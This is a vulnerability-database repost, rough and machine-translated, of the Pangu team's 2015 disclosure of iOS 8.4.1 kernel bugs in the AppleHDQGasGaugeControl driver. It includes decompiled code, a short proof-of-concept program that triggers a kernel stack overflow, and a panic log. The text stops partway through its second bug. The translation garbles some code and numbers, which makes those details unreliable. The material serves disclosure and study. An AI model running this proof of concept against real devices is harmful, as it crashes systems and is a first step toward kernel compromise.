Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201566788
HistorySep 10, 2015 - 12:00 a.m.

Pangu disclosure iOS8. 4. 1 kernel exploit Apple to iOS9 in the repair section-Vulnerability warning-the black bar safety net

2015-09-1000:00:00
佚名
www.myhack58.com
12
JSON

Yesterday, China’s first successful jailbreak the iOS team Pangu team discloses 3 present in the iOS 8.4.1 kernel extension at the vulnerabilities: a stack overflow Bug, an out of bounds memory access Bug, a stack overflow Bug. One of the“perfect”could be compromised all the kernel protection and to achieve code execution.
“When performing the iOS kernel review, we found com. apple. driver. AppleHDQGasGaugeControl the encoding quality is very bad. In this blog, we will be open 3 in the iOS 8.4.1 kernel extensions found 3 vulnerabilities. More importantly, one of the bug is belong to stack overflow, which can allow us to beat all the kernel ease the method and get the core of the implementation code, just the“perfect”use of this single vulnerability can be.”
selector 7 functions stack overflow vulnerability
The processing function takes 3 Input a scalar and 1 is an output scalar. The following code shows a possible stack overflow, because there is no limit to the inputScalar to[1]. If inputScalar[1]is a very large number, the loop will corrupt the stack.
int v17; // [sp+0h] [bp-3Ch]@5
int v18; // [sp+10h] [bp-2Ch]@2 5
if ( inputScalar[1] )
{
v10 = 0;
do
{
v11 = -64;
if ( (1 v10) & inputScalar[0] )
v11 = -2;
*((_BYTE *)&v17 + v10++) = v11; // v17 is on the stack
}
while ( inputScalar[1] != v10 );
}
This POC is very simple. We tried to first open the service, and call panic1 functions trigger a stack overflow.
void panic1(io_connect_t connection)
{
uint64_t inputScalar[3];
uint64_t outputScalar[1] = {0};
a uint32_t that outputCnt = 1;
inputScalar[0] = 0xF000000;
inputScalar[1] = 0xF000000;
inputScalar[2] = 0xF000000;
IOConnectCallMethod(connection, 7, inputScalar, 3, NULL, 0, outputScalar, &outputCnt, NULL, NULL);
}
int main(int argc, const char * argv[])
{
CFMutableDictionaryRef matching = IOServiceMatching(“AppleHDQGasGaugeControl”);
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
io_connect_t connection;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connection);
if(KERN_SUCCESS == kr){
panic1(connection);
}
return 0;
}
PANIC LOG
panic(cpu 1 caller 0x950b8e95): kernel abort type 4: fault_type=0x3, fault_addr=0x93034000
r0: 0x000004ac r1: 0x00000001 r2: 0x93033b54 r3: 0xffffffc0
r4: 0x0f000000 r5: 0x971ddc00 r6: 0x0f000000 r7: 0x93033b90
r8: 0x93033bd0 r9: 0x145d1371 r10: 0x0f000000 r11: 0x9540a390
r12: 0x00f42400 sp: 0x93033b54 lr: 0x95ccffcb pc: 0x95ccfeda
cpsr: 0x60000033 fsr: 0x00000807 far: 0x93034000
Debugger message: panic
OS version: 12H321
Kernel version: Darwin Kernel Version 14.0.0: Wed Aug 5 1 9:2 4:4 4 PDT 2 0 1 5; root:map-2784.40.6~1 8/RELEASE_ARM_S5L8950X
Kernel slide: 0x0000000015000000
Kernel text base: 0x95001000
Boot : 0x55eebb5c 0x00000000
Sleep : 0x00000000 0x00000000
Wake : 0x00000000 0x00000000
Calendar: 0x55eebbf2 0x000413c9
Panicked task 0xb6d20318: 2 4 7 pages, 1 threads: pid 1 8 0: m1
panicked thread: 0x813f75e0, backtrace: 0x93033820
0x950b5cc9
0x950b6061
0x9501ee2b
0x950b8e95
0x950b1800
0xc0c0c0c0
selector 1 4 Memory bounds access vulnerability
The processing function does not occupy any entry in memory, but the processing of the shared memory. As in our black hat of the General Assembly discussed above, it is very easy by calling the IOConnect memory, to control the shared memory content. By checking the start function, we will see how the driver initializes shared memory.
v8 = (IOBufferMemoryDescriptor *)IOBufferMemoryDescriptor::withOptions(0x10000, 4 0 9 6, 1);
*(_DWORD *)(v2 + 1 0 0) = v8;
if ( v8 )
{
mapAddr = (void )((_DWORD (__cdecl **)(IOBufferMemoryDescriptor ))((_DWORD *)v8 + 2 2 0))(v8);
*(_DWORD *)(v2 + 1 0 4) = mapAddr; // object+1 0 4 stores the memory address
bzero_130(mapAddr, 0x1000u);
*(_DWORD )((_DWORD *)(v2+ 1 0 4) + 2 0) = 3 3 9; // memory+2 0 stores the total count
In fact, the memory for storing data, each element of the array is 1 2 bytes. So 4KB memory can accommodate 3 3 9 elements. Then let’s further examine the function how to deal with Shared memory.
mapAddr = *(_DWORD *)(self + 1 0 4); // get memory address of share memory

[1] [2] [3] next

JSON